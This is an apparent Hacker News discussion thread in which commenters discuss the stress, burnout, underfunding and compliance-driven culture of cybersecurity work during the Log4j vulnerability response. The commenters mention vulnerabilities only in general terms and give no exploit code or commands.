top | item 29552136

Ask HN: Are Cybersecurity Workers Ok?

106 points| Victerius | 4 years ago

In the last 12 months we have seen the SolarWinds hack, the Microsoft Exchange Server data breach, and since Friday, Log4j. I'm reading an article on CNN about the US government's response to Log4j.

"Organizations are now in a race against time to figure out if they have computers running the vulnerable software that were exposed to the internet. Cybersecurity executives across government and industry are working around the clock on the issue."

""For most of the information technology world, there was no weekend," Rick Holland, chief information security officer at cybersecurity firm Digital Shadows, told CNN. "It was just another long set of days.""

The sysadmin subreddit is also full of professionals talking about the problem.

With so many large scale hacks, 0-days, and breaches happening these days, are cybersecurity professionals ok? Have studies about the mental health and anxiety levels of this group of professionals been conducted?

136 comments

order
[+] dmhmr|4 years ago|reply
The past few years have made me feel sour on how many organizations run cybersecurity in general. The industry is full of individuals who do not understand the tech they are protecting, and often they barely understand the security tech they use daily. A lot of places are simply doing compliance check-marking and barely have a shred of technical aptitude. They struggle with basic fundamentals like inventory and patch management. It is an industry that is hard to stay upbeat about if you are looking at anything larger than how it benefits your personal paycheck. If you want to get insight into the reality of how the government operates, just look at GAO reports, they are alarming: https://www.gao.gov/highrisk/ensuring-cybersecurity-nation
[+] Bhilai|4 years ago|reply
Add to that the general lack of education around cyber security, hardly any mainstream CS course teaches cyber security as a mandatory course. We have CS Phds engineers who are experts in their domains but struggle to understand basic security concepts. We need to educate engineers to care about security of their code and systems just like they care about performance, reliability, maintainability etc.

The problem is further exacerbated by a class of people who received their MBAs and think they know it all. Just yesterday, a lead product manager was arguing with security folks about why his service needs to be patched for log4j vuln if its not internet facing. He had trouble fathoming that even though his service is not internet facing, it processes and logs user controlled data.

Look at recent Azure vulns, I am pretty sure their internal security team knew about these and after some back and forth some exec might have signed off an exception. They would rather be shipping features than fixing the mess they created. Most infosec peeps have trouble getting teams to prioritize of security stuff and some of the blame falls of infosec teams too for making everything sounds like a end of world scenario. But did Azure lose a single customer or did the stock price go down or loss of revenue? Nope, so whats the point of investing so much in security if it truly the only harm was some loss of reputation.

Even most security execs I have had a chance to interact with dont understand security topics properly, surely they can use some jargon to throw around in all-hands meetings and such. Unless from a security background these execs often confuse security with compliance and instead of investing in defense in depth techniques they look for check-boxes against security controls.

[+] phoehne|4 years ago|reply
Have you ever worked with someone in information security, only to find out they're checking off features but don't know what they're doing? Has it been scanned by this piece of software (which produces 832 fans positives) and provided a remediation plan? Has everyone taken the on-line cyber security training? Do you have a documented architecture? Are you using the approved software versions (only they didn't get the memo we've moved on from Java 1.8)?

I once had to argue back and forth with someone (circa 2008) that JavaScript did not mean "mobile code" in the sense of their checklist. I had to explain what JavaScript was, how it worked, but they were more than willing to tell me I had to remove it from the app I was working on. Which would have rendered my app and all the other apps for that client much less functional.

[+] ransom1538|4 years ago|reply
This. The only person I would trust is a person that was a sysadmin for at least 10 years and decided to specialize in security for another 5 years. So you are looking at minimum of 15 years experience to be decent. Without deep sysadmin skills - I am at a loss of what they would contribute. You are going to update our firewall without understanding what CIDR notation is? You are going to create a VPC for the dev environment not knowing what a subnet mask is? You are going to monitor security with thousands of VMs with no cloud background? Security is a specialized specialized field. Not only that you need to be a bit of a bully. You are always fighting PMs for more time to vet things and patch things - all while being a cost center.

Why do we have so many security disasters? Because those people are rare unicorns, ridiculously expensive, with no way to show added value.

[+] formerly_proven|4 years ago|reply
Most jobs in "cybersecurity" are essentially just around for CYA purposes and not actually for improving security in any meaningful sense. Indeed, deployment of "security measures" for managerial CYA purposes result in things actively detrimental to security, like widely deployed, invasive snakeoil and many other things.
[+] asdfsd234234444|4 years ago|reply
That's because having good security doesn't make you more money.
[+] CommanderData|4 years ago|reply
I had our sec team try and blanket ban base64 strings on our WAF in response to log4shell. I'm talking body, url everything.

The reasoning was we probably don't use base64. I was amazed.

[+] antihero|4 years ago|reply
> A lot of places are simply doing compliance check-marking and barely have a shred of technical aptitude.

Why would they? Does capitalism incentivise "caring" on a technical and ethical level about doing the right thing, or does it incentivise spending the minimum amount of resources to be covered by insurance and not criminally liable for anything? If they did the "right thing", someone in management is wasting resources.

Of course, if your company is private and the shareholders are decent enough people to make sure the board are doing things properly, this can work. With public companies I don't see how it is remotely feasible?

We have to legislate to compel companies to do this and expand the definition of negligence, which itself is quite complex. Make the people at the very highest levels criminally liable for breaches that happen due to lax, box checking behaviour on their watch. It is the only way.

[+] jabroni_salad|4 years ago|reply
You really have to have a zen mindset and refuse to let these outside issues control you. There is infinite bad shit out there and you can work for years and barely make a dent in it. That is just how it is.

Personally, I am helped by being a client server. It constantly amazes me the kind of risk a business is willing to accept for barely anything in return, and if I actually had a personal stake in what I am seeing at clients I think I would be much more stressed.

Also, the issue is not just 'are security professionals ok'. Good security starts with good operations, and good operations is a rarity. We need devs to ship products that can run with least privileges and have secure defaults. We need operators to have a good understanding of their own environment and to design things on purpose rather than just improvising. We need security people that can offer more guidance than just printing out a nessus scan. We need business analysts who are pragmatic with concessions and who are willing to spend the resources needed to do things right the first time.

[+] lbriner|4 years ago|reply
I think a big issue from what people are saying is that somehow it has become an infosec's employee's fault that the system is not secure. This is about managing boundaries and happens in many disciplines. My wife struggles as a Solicitor with unending demands on her time and the guilt-trips of "This agreement needs to be done on Friday" and for some reason, people get upset if the response is, "you should have given me 4 weeks notice".

The landscape is desperate with hundreds of apps, servers, networks, employees etc. in most companies. The tooling is either difficult or expensive or both - how many people allow outgoing firewall traffic by default because it is too complicated to whitelist everything that needs to go out? Even with the best will in the world, basic things like Windows updates, SSL cert updates (no we can't all use Lets Encrypt), Linux updates can be a full-time role.

But to be fair, our industry is still quite immature. We do not have the regulatory backup across the globe to assure all products are developed securely etc. We use open-source libraries with barely any checks (and what would we check anyway?) and IT is mostly intangible so how do we even know what we are doing anyway?

This sounds doom and gloom but I think every industry has a Wild West stage that teaches people what is and isn't important and allows industries and products to mature eventually to something that is sustainable.

[+] jodrellblank|4 years ago|reply
> "somehow it has become an infosec's employee's fault that the system is not secure."

Yet, it still isn't; elsewhere someone mentioned doctors and by comparison a doctor must pass nationally recognised exams and afterwards take personal responsibility for what they do every day, hold malpractise insurance and risk being struck off medical registers and forbidden from practising again for e.g. incompetence, unethical behaviour, malpractise. What are the equivalent of these in cybersecurity?

Customers or users whose data is stolen in a hack, employees who lost their jobs to a ransomware attack shutting down a company, what equivalent of "medical malpractise" lawsuits can they bring against the infosec team that was employed and paid to keep them safe? Can it even be determined by the harmed people whether the infosec team acted unethically or incompetently vs. sensibly? What reassurance can they take when the infosec employee says "I told them I shouldn't be opening this connection and they made me, so it's not my fault"? Imagine a surgeon performing a surgery they disagree with on a patient because non-medically qualified hospital management told them to. What happens to the security teams who incompetently don't protect against those harms and they carry on to their next job without any obligation to disclose their association? What board of reasonably trusted people is overseeing them, holding them to account, what register can they be struck off? It's "mistakes were made" all the way up to the CEO.

I don't agree that it's the infosec employee's fault. (Insert popular civil engineering/bridge design comparison here, and the need for a competent qualified senior engineer to sign their name against a design which they can personally be held responsible for).

[+] davewritescode|4 years ago|reply
No we’re not. I will tell you this year I’ve dealt with more security incidents than I have in my entire career combined.

My organization takes security seriously but and the end of the day we serve customers who don’t. That’s been the bulk of our issues this year.

log4shell has just been the icing on the cake.

[+] ackbar03|4 years ago|reply
Are you at least getting paid better?
[+] bluedino|4 years ago|reply
As a cybersecurity person, what do you do about log4j?

1. Try to identify if you are vulnerable

2. Inform people in your company

3. Contact vendors of vulnerable products and ask for a patch

4. Have sysadmins install said patch

Cybersecurity people don't do anything. You're not patching. You're not finding the new flaws. You're reactively trying to solve problems when they make the news.

[+] rank0|4 years ago|reply
Hell yeah I’m doing fuckin great. I make almost double what I did two years ago and I’m receiving 20+ job solicitations per week. I believe the ever escalating rate of hacks has dramatically improved the job market from the employees perspective.

Cybersecurity is SUPER broad though and there’s a range of many different roles. I’m a bit surprised all the folks here saying they’re not okay. Best of luck to them and maybe it’s time for a role swap.

I used to work in a SOC so I get it and probably would be struggling if I was still there.

[+] y-c-o-m-b|4 years ago|reply
What are your working hours like?

Also somewhat related - what's the best path for a senior software developer to enter that space? Is the pay the same?

[+] maskull|4 years ago|reply
What do you do now?
[+] jart|4 years ago|reply
I'm not a worker but it sounds similar to the Mad Gadget remote code exec bug in Apache Commons Collections that was discovered five years ago. I wrote a blog post about it. https://opensource.googleblog.com/2017/03/operation-rosehub.... Back when I worked at Google, we sent pull requests to about 2,600 open source projects. The thought never really crossed our minds to blog about it publicly. The problem is that people just kept getting hacked, because these Java core libraries are everywhere. Looking back to Mad Gadget should give us some idea of what to expect. I can't tell for certain but this Log4j RCE could be worse since Apache says it can be triggered not just by the format string but also by the log parameters. However I'm not sure what they mean by LDAP since I wouldn't have thought that'd intersect with a logging library. https://logging.apache.org/log4j/2.x/security.html
[+] flamesofphx|4 years ago|reply
I gave up on continuing into cybersecurity, after just first experiences several years ago, I keep up with people though (Out of the 15 I knew 4 have quit, one even going to do construction work, 2 commited suicide). I now consider it the IT janitorial department basically with the budget and control the department gets the only thing you get to do is fling feces on the wall (An analogy for the reports for things that need fix but never get down because (Pick ONE)):

1. Not Budgeted for.. 2. To Much Down time (Excuse on systems even, that are fully load balanced).. 3.. WHHHHHHNNN But we need that legacy system (Which is real, because if it goes down the whole network does)... 4. This doesn't sound critical, let's bring this up next year. 5. Because I (Non-techy boss man) said we're not going to do it. As a matter of fact I am going to sue: HIPPPA, OR PCI, OR Some Reg agency for governmental overreach of a proper business.

[+] ivlad|4 years ago|reply
Log4j vulnerability became big news Friday evening. I did not have a weekend. Monday I went to bed at 3AM (technically Tuesday) and I was up at 8. It’s midnight and I am not yet done for the day.

Am I okay?

[+] zaphar|4 years ago|reply
You might not be. Make sure you take some time off after this. You deserve it.
[+] AccountToUse|4 years ago|reply
Hopefully you are hourly at least and make up with sweet overtime. I apologize deeply if you are salaried.
[+] Bhilai|4 years ago|reply
Take rest! There will be another one of these and more work to be done in future.
[+] jhickok|4 years ago|reply
Thank you for your service.
[+] mrweasel|4 years ago|reply
I think it depends on your job. As someone working I operations I contantly feel that business and developers are pushing solution far beyond what can safely supported. With stuff like Docker, Kubernetes and DevOps, developers have failed to understand that much of the security responsibility have shifted from Ops to Dev. Did I patch the OS? Yes, of cause. Did you update your container in the last few months? If not, then why the F… does it matter if I patched the OS?

On the other hand my colleguaes who look for hackers, do forensics and help customer who are/have been attacked are having the time of their life. Rarely do you see people as excited about their works as these guys during this weekend.

[+] ancode|4 years ago|reply
I work for one of the OS makers and we have been making a concerted effort to get rid of memory safety issues across the codebase. I'm not sure if the open-source side of things are attempting similar efforts but as far as consumer OS's I have seen a lot of improvement over the last 10 years.

I feel bad for anyone working in an org that doesn't have the ability to proactively find bugs in their stuff. Lots of places are cheap and don't account for the debt they accrue by not updating their systems. 'if it aint broke don't fix it' doesn't apply to software. What you are shipping is always broken. 'safe' languages are written in unsafe languages. The interpreter has bugs, the vm has bugs, the virtualization stack has bugs, the OS has bugs, the libraries to do everything have bugs. What is there and what is known are both moving targets. If you are not hiring the offensive minded individuals who will find the bugs with or without your support then you will not know about the bugs until they are out in the wild. If you aren't willing to pay those people you are accruing debt that will come due later.

[+] ajsmitty|4 years ago|reply
No, No we are not.

There has been serious underspending by companies for cybersecurity for at least a decade now. Companies are slowly waking up to the fact that the security team can't be less than 1% the size of the development team.

Companies have let developers do whatever they want for so long, that when infosec comes in and says we need to change this so we have better visibility in to what is being used, or how, it's "Oh this will hurt productivity, so no".

The shit I have heard because companies don't want to spend money on cybersecurity, because putting out new features is more important than something that "might" happen. They just keep spending more on endpoint security and letting everything inside do whatever it wants.

and why would they? Bad hacks blow over after a year or two. Equifax is still ticking along, so is Citi bank, so is capital one. Nobody cares if you get hacked, just pay a fine and give it some time and things will go back to normal.

[+] turminal|4 years ago|reply
The only truly new thing in the last year is that it's in the news. The reality was always full of breaches and security holes. The paragraph you quote is mostly just inflating the issue in a typical journalistic manner.
[+] waihtis|4 years ago|reply
This is somewhat of a bottleneck moment; a lot happening demanding constant attention from the frontline yet budgets & resources are still reasonably bad all around.

Saying bottleneck implies there's expectation of a better future ahead, but so far there's very few repercussions for neglecting this stuff and so it's unclear whether it'll improve or just become worse.

[+] metafex|4 years ago|reply
In my experience of almost a decade in infosec now, no, we're not okay. I don't know any other group where so many people are struggling with burnout or who have developed a drinking habit because of their jobs. Might be selection bias, but this industry eats people alive, more so than others.
[+] giantg2|4 years ago|reply
"Organizations are now in a race against time to figure out if they have computers running the vulnerable software that were exposed to the internet."

Large orgs should already have sufficient documentation as to which packages and versions are in use and what systems pulled them from their proxy repo.

[+] riskable|4 years ago|reply
> Large orgs should already have sufficient documentation as to which packages and versions are in use and what systems pulled them from their proxy repo.

Key word there: "should".

Let's say you have all your 50,000 applications well-documented. You think those docs are all going to be searchable in one place? That's an information disclosure vulnerability! No, all 50,000 applications documentation will be silo'd and only accessible to a select few people who work on them (you hope).

So now something like the log4j vulnerability crops up: You need to find out which systems are using log4j and what version. Best you can do is ask around... Demand that every application team cough up the details ASAP.

Now let's say you get data (emails) back suggesting that 5,000 applications are using log4j for certain, 1,000 may be using it (they're Java based apps), and you've confirmed that 14,000 most certainly are not using it. That leaves 30,000 applications where you have no idea if they're vulnerable.

You get data from the Artifactory ("proxy repo") team and they tell you, "we have 150,000 servers that have pulled down log4j (various versions)." Well, that's not particularly helpful so you get the raw data and try to correlate servers to applications only to find that's not helpful either: Because multiple "applications" could be using the same server and just because a log4j version was pulled doesn't mean it's actually being used by anything (in production).

After a few days of investigating the issue you find out that some thousands of applications actually are using log4j but it was included as part of a dependency. You tell them to update it.

Then you find out that 10,000 applications at present have no active development teams which explains why you got no response. Then there's an ungodly number of applications where no one has access to the source code anymore, 3rd party applications, etc.

So even if you have a central proxy repo and excellent documentation on all your stuff that doesn't mean it's going to be easy to hunt down and patch everything (that needs to be patched).

[+] digitalsushi|4 years ago|reply
I'm not technically a cybersecurity person, but yeah I'm working through the holidays to make sure a portfolio of container images, vsphere templates, amis, openstack glance images, anywhere log4j can be hiding, is cleaned out or revved up. I'm getting despondent and was really looking forward to the first mental break this year. I'm bad at pushing back, and don't get anything personal out of playing a martyr. I'm good enough at my job to be the person who has to fix it on Christmas, not important enough to be the person who has to fix it on Christmas.

I know I'll see half of y'all online with me :-/

[+] lmeyerov|4 years ago|reply
Entry level, on average, churns out in 1yr. Other reasons for that too, but it's not a carefree job. I love helping the analysts using us, but gets frustrating seeing how many are treated.

Developers make products: they are indirect profit centers, and while everyone sees room for improvement, get treated relatively well.

Conversely, outside of areas like say finance, big tech, & gov, sec teams get starved and ignored as cost centers. Their event log DBs (SIEMs) are often from 15+ years ago and might even be SQL-based (think MySQL, not bigquery), if they even have one.

Not fun even before all this - automated attacks with bad support has been going on for years.

[+] cdot2|4 years ago|reply
I'm not a cybersecurity worker (although I would like to be) and I would with them. There's been a lot of activity but I wouldn't say they're more stressed than normal. We did have some log4j stuff but to my knowledge weren't affected by the exchange server or solarwinds exploits. News companies are generally going to exaggerate and use hyperbolic language to make things seem as exciting as possible "organizations are now in a race against time" in order to get more clicks.
[+] toyg|4 years ago|reply
I reckon the scale is simply not linear.

The likes of FAANG or banks, they have a big target painted on their backs; so they are scrambling for cover. However, the overwhelming majority of other businesses are not under similar pressure, because it's unlikely they will be targeted first - if at all.

I was actually talking about this with a friend who works for a company that provides a few niche services. They've had log4j 1.x in production for eons, which is also vulnerable to bad remote exploits, and nothing ever happened - simply because hackers are extremely unlikely to target their services. Obviously it doesn't mean they shouldn't upgrade, but the pressure is basically not there - at least until something Really Bad actually happens. He was actually pissed off at his manager making a big deal out of this exploit simply because it ended up on the mainstream press.

[+] ninegunpi|4 years ago|reply
Infosec emotional climate always had a certain pessimistic, paranoid and panicky perception from the outside, but it is greatly exaggerated, I think.

FUD, bullshit, lack of skilled people, lack of budgets, lack of understanding from adjacent departments, chaos, mayhem, overtimes, incidents and creeping "I'm not sure what's going on" have always been parts of the profession. Learning to accept frustration, constant change, ill-formed perception and rejection is part of your career choice and a selection factor in the long term. Learning to look at the world from a certain angle which is hard to unlearn (especially if you're good at it) is a mental equivalent of firefighter's calluses.

If you can bear with it all - being on defensive side and being a kind of digital first responder (regardless of where exactly you are in the industry) is a fun job and calling for some.

(Edits: Typos)